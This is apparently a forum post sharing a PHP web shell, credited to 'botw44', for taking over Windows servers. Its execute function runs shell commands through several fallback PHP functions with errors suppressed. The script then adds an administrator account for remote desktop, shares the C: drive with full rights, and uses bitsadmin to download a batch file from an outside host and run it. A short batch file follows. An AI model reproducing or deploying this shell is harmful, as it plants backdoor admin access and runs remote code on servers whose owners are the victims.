Código PHP:
<?php
/*
* a new botw44 shell
* this one is for rooting windows
* you can add your own file as you please and execute it
* please leave my credits thanks in advanced
* */
function execute($cmd){
if(function_exists("exec")) {
@exec($cmd,$result);
$result = join("\n",$result);
}
elseif(function_exists("shell_exec")) {
$result = @shell_exec($cmd);
}
elseif(function_exists("system")) {
@ob_start();
@system($cmd);
$result = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists("passthru")) {
@ob_start();
@passthru($cmd);
$result = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cmd,"r"))) {
while(!@feof($f)) {
$result .= @fread($f,8192);
}
@pclose($f);
}
else {
$result = `$cmd`;
}
return $result;
}
// add admin account for mstsc
echo "<pre>".execute("net user /add useraccountname mypassword")."</pre>";
echo "<pre>".execute("net localgroup administrators useraccountname /add")."</pre>";
echo "<pre>".execute("net share concfg*C:\\/grant:useraccountname,full")."</pre>";
echo "<pre>".execute("net user useraccountname *")."</pre>";
// see the batch file here: http://zpilman.com/bestand.bat.txt
echo "<pre>".execute("bitsadmin /transfer mydownloadjob /download /priority normal http://zpilman.com/bestand.bat c:\bestand.bat")."</pre>";
echo "<pre>".execute("start /B C:\bestand.bat")."</pre>";
echo "<pre>".execute("exit")."</pre>";
Código PHP:
@echo off
mkdir C:\exploit
echo text inserted into file >> C:\exploit\bestand.txt
credits -> botw44